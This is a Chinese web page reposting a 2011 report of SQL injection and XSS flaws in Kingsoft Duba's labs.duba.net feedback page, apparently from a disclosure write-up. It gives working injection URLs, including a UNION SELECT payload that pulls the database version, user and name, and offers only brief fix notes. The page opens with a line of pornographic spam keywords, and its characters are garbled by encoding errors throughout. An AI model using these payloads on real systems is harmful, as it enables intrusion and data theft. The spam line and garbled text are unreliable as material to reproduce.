亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

金山毒霸多個(gè)sql注入及XSS漏洞和修復(fù)

  發(fā)布時(shí)間:2011-03-11 11:59:27   作者:佚名   我要評(píng)論
金山毒霸多個(gè)sql注入及XSS漏洞和修復(fù),需要的朋友可以參考下。

  第一個(gè)

  簡(jiǎn)要描述:由于變量過(guò)濾不嚴(yán)產(chǎn)生SQL注入漏洞 可通過(guò)入侵手段 拿到站點(diǎn)權(quán)限

  詳細(xì)說(shuō)明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

  漏洞證明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

  http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

  結(jié)果明顯不同 注入漏洞產(chǎn)生

  修復(fù)方案:過(guò)濾變量app

  第二個(gè)

  簡(jiǎn)要描述:過(guò)濾不嚴(yán)導(dǎo)致存在SQL注入

  詳細(xì)說(shuō)明:過(guò)濾不嚴(yán)導(dǎo)致存在SQL注入 有機(jī)會(huì)拿下服務(wù)器權(quán)限

  漏洞證明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

  http://labs.duba.net/robots.txt

  未作進(jìn)一步測(cè)試

  修復(fù)方案:過(guò)濾參數(shù)

  第三個(gè):

  簡(jiǎn)要描述:留言處過(guò)濾不嚴(yán) 造成跨站漏洞

  詳細(xì)說(shuō)明:留言處過(guò)濾不嚴(yán) 造成跨站漏洞

  漏洞證明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

相關(guān)文章

最新評(píng)論